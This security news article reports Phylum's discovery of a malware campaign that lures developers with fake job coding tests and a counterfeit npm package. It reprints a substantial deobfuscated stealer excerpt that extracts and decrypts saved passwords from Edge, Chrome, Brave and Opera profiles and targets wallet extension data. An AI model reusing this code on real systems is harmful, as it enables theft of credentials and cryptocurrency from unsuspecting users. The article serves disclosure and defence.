
Windows Malware Dropped From Fake Software Developers Job Offers

by admin
Feb 24, 2024
in News

February 24, 2024 – Phylum, a software supply-chain security company, has detailed a malware campaign aimed at software developers who are looking for work.

The scheme, identified in collaboration with Palo Alto Networks' Unit 42, uses fake developer job offers as the lure: the "coding test" the candidate is asked to complete is the delivery vehicle for malware that runs on the victim's Windows system.


Fake job description for a developer role

The campaign is attributed to North Korean actors, relies on obfuscated JavaScript, and has been tied to the BeaverTail malware family. The finding is part of Phylum's ongoing work to keep malicious packages out of the open-source ecosystem.

The company's latest report spotlights an npm package that masquerades as a code-profiling utility and, once installed, runs malicious scripts designed to steal browser credentials and cryptocurrency wallet data.

According to the Phylum report shared with Cyber Security News, the attackers hid their payload inside a test file, relying on the fact that developers rarely scrutinise test code for threats. The operation nevertheless contained mistakes that allowed Phylum's researchers to connect the malicious package to suspect GitHub repositories and extend their investigation from there.

On February 5, 2024, an npm user under the alias "nino1234" published a version of the execution-time-async package, a look-alike of the legitimate execution-time utility, which has more than 27,000 downloads.

Once deobfuscated, the counterfeit package revealed its purpose: stealing saved logins and passwords from several browsers. After that initial theft, a Python script is downloaded and executed, which in turn fetches further payloads and harvests additional personal data.

Stealer supports multiple browsers

// Excerpt of the deobfuscated stealer as published by Phylum. Identifier names are
// the obfuscated originals; the comments were added for this article. H, j and Ut
// are helpers defined elsewhere in the package (not in this excerpt); from their
// use, j is an existence check and Ut writes out or sends the collected text.
const K = "/AppData/Local/Microsoft/Edge/User Data",
  // P(t, c): dump saved logins from the Chromium-based browser whose "User Data"
  // directory is c, labelling the output with tag t.
  P = (t, c) => {
    result = "";
    try {
      const r = `${t}`,
        // store.node is a native addon shipped with the package; it exposes
        // CryptUnprotectData so the script can call DPAPI directly.
        e = require(`${homedir}/store.node`);
      if (osType != "Windows_NT") return; // this routine is Windows-only
      const E = "SELECT * FROM logins",
        s = `${H("~/")}${c}`;
      // "Local State" holds the browser's AES key, base64-encoded and DPAPI-wrapped.
      let F = path.join(s, "Local State");
      fs.readFile(F, "utf-8", (t, c) => {
        if (!t) {
          (mkey = JSON.parse(c)),
            (mkey = mkey.os_crypt.encrypted_key),
            (mkey = ((t) => {
              // base64 string -> Uint8Array
              var c = atob(t),
                r = new Uint8Array(c.length);
              for (let t = 0; t < c.length; t++) r[t] = c.charCodeAt(t);
              return r;
            })(mkey));
          try {
            // Drop the 5-byte "DPAPI" prefix, then unwrap the key under the user's DPAPI secret.
            const t = e.CryptUnprotectData(mkey.slice(5));
            // Walk "Default" and "Profile 1" .. "Profile 200".
            for (ii = 0; ii <= 200; ii++) {
              const c = 0 === ii ? "Default" : `Profile ${ii}`,
                e = `${s}/${c}/Login Data`,
                o = `${s}/t${c}`; // working copy; the live database is locked while the browser runs
              if (!j(e)) continue;
              const F = `${r}_${ii}_Profile`;
              fs.copyFile(e, o, (c) => {
                try {
                  const c = new sqlite3.Database(o);
                  c.all(E, (r, e) => {
                    var E = "";
                    r ||
                      e.forEach((c) => {
                        var r = c.origin_url,
                          e = c.username_value,
                          o = c.password_value;
                        try {
                          // Chromium blob layout: 3-byte "v10"/"v11" prefix, 12-byte GCM nonce,
                          // ciphertext, 16-byte authentication tag. The tag is never passed to
                          // setAuthTag(), so update() yields the plaintext without verifying it.
                          "v" === o.subarray(0, 1).toString() &&
                            ((iv = o.subarray(3, 15)),
                            (cip = o.subarray(15, o.length - 16)),
                            cip.length &&
                              ((mmm = crypto.createDecipheriv("aes-256-gcm", t, iv).update(cip)),
                              (E = `${E}W:${r} U: ${e} P:${mmm.toString(
                                "latin1"
                              )}\n\n`)));
                        } catch (t) {}
                      }),
                      c.close(),
                      fs.unlink(o, (t) => {}), // remove the working copy
                      Ut(F, E);
                  });
                } catch (t) {}
              });
            }
          } catch (t) {}
        }
      });
    } catch (t) {}
  },
  // Per-browser "User Data" locations, ordered [macOS, Linux, Windows].
  ot = [
    [
      "/Library/Application Support/Google/Chrome",
      "/.config/google-chrome",
      "/AppData/Local/Google/Chrome/User Data",
    ],
    [
      "/Library/Application Support/BraveSoftware/Brave-Browser",
      "/.config/BraveSoftware/Brave-Browser",
      "/AppData/Local/BraveSoftware/Brave-Browser/User Data",
    ],
    [
      "/Library/Application Support/com.operasoftware.Opera",
      "/.config/opera",
      "/AppData/Roaming/Opera Software/Opera Stable/User Data"
    ],
  ],
  st = "Local Extension Settings", // per-profile extension storage, where wallet extensions keep their data
  Bt = "solana_id.txt";

Phylum's disclosure has also drawn thanks from the developer community: several developers who narrowly avoided falling for the scheme credited Phylum with raising awareness of this targeted attack.

As the investigation continues, Phylum says it remains committed to identifying and neutralising threats in the open-source ecosystem. The company urges developers and organisations to remain vigilant, especially when responding to unsolicited job offers or integrating third-party packages into their projects.

For more technical analysis information on protecting your systems and data from similar threats, visit Phylum’s website or contact their cybersecurity experts directly.

